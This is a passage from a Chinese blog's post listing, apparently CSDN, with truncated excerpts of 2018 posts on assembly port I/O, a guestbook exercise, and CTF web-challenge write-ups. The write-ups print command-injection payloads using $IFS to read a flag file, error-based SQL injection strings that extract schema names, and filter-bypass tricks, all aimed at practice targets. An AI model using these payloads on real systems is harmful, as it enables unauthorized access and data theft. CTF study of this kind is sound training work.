- 博客(11)
- 资源 (3)
- 收藏
- 关注
原创 汇编指令学习
INT OUTCPU对外设的操作通过专门的端口读写指令来完成; 读端口用IN指令,写端口用OUT指令。IN AL,21H;表示从21H端口读取一字节数据到ALIN AX,21H;表示从端口地址21H读取1字节数据到AL,从端口地址22H读取1字节到AHMOV DX,379H IN AL,DX ;从端口379H读取1字节到ALOUT 21H,AL;将AL的值写入21H端口 O...
2018-12-26 16:38:55 3302
原创 2018中原工学院网络安全校赛
Drops攻防训练营欢迎你的加入打开页面查看响应头有一个 tips:4he9e.txt 然后访问这个页面<?php$flag = "***";if (isset($_GET['repo'])) { if (strcmp($_GET['repo'], $flag) == 0) die('Flag: '.$flag); else ...
2018-12-24 23:08:39 676
原创 留言板
第一次的留言板第一次写留言板,真的好辛苦,几分钟看懂的代码自己一个个敲花了一下午体会到开发的痛苦了,喜欢自己以后可以多写东西出来index.html<!DOCTYPE html><html><head><meta charset="utf-8"> <title
2018-12-23 23:35:30 240
原创 安恒杯12月月赛
WEB 这次的月赛可以说非常适合我这种菜鸡做了ezweb2:请求包中发现一个user=base64解码得到user,构造admin 然后base64提交发现跳转到后台admin.php试了一个ls发现有回显,应该是个命令执行漏洞构造: cmd = ls$IFS/ 成功回显然后读取flag: cmd = cat $IFS /ffLAG_404easy:<?php ...
2018-12-23 23:02:15 1493
原创 神盾局的秘密
题目地址 :http://web.jarvisoj.com:32768/ 一般套路,先看HTTP头,源码 通过扫网站发现存在index.pnp访问也没有什么东西尝试:http://web.jarvisoj.com:32768/showimg.php?img=index.php 将index.php进行base64试试:view-source:htt...
2018-12-21 22:27:57 356
原创 实验吧-程序逻辑问题
<?phpif (isset ($_GET['password'])) { if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE) // 只能包含字母或者数字开头 { echo '<p>You password must be alphanumeric</p>'; } else ...
2018-12-18 12:54:34 327
原创 拐弯抹角
Flag:<?php // code by SEC@USTC echo '<html><head><meta http-equiv="charset" content="gbk"></head><body>'; $URL = $_SERVER['REQUEST_URI']; //echo 'URL:
2018-12-16 15:33:58 394
原创 简单的sql注入之3
exp报错'or exp(~(select * from (select database())x)) or' 'or exp(~(select * from (select group_concat(table_name)from information_schema.tables where table_schema=database())x))or' 'or exp(~(s...
2018-12-15 21:19:30 409
原创 实验吧-你真的会PHP吗?
<?php$info = ""; $req = [];$flag="xxxxxxxxxx";ini_set("display_error", false); error_reporting(0); if(!isset($_POST['number'])){ header("hint:6c525af4059b4fe7d8c33a.txt"); die("h...
2018-12-15 15:32:14 421
原创 实验吧CTF(认真一点!)
输入1输入2或者其他内容看来只有输入1猜显示you are in 输入其他都是you are not in 输入;过滤了:union空格逗号%and^sleepsubstr|#;发现or 没有过滤先看看可以用哪些来代替空格经过测试 /**/ 可以代替空格于是构造id=1'/**/or/**/1='1按理来...
2018-12-13 22:50:41 1845
原创 CTF实验吧- 加了料的报错注入分值
用burpsuit对username进行fuzz一下,发现过滤了超多东西,被过滤就会显示 user name unknow error 或者Sql injection detected 或者Unknown password error.没有过滤只会显示 Login failed# limit strsub union () ,没有过滤extractvalue,up...
2018-12-11 11:45:49 448 1
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人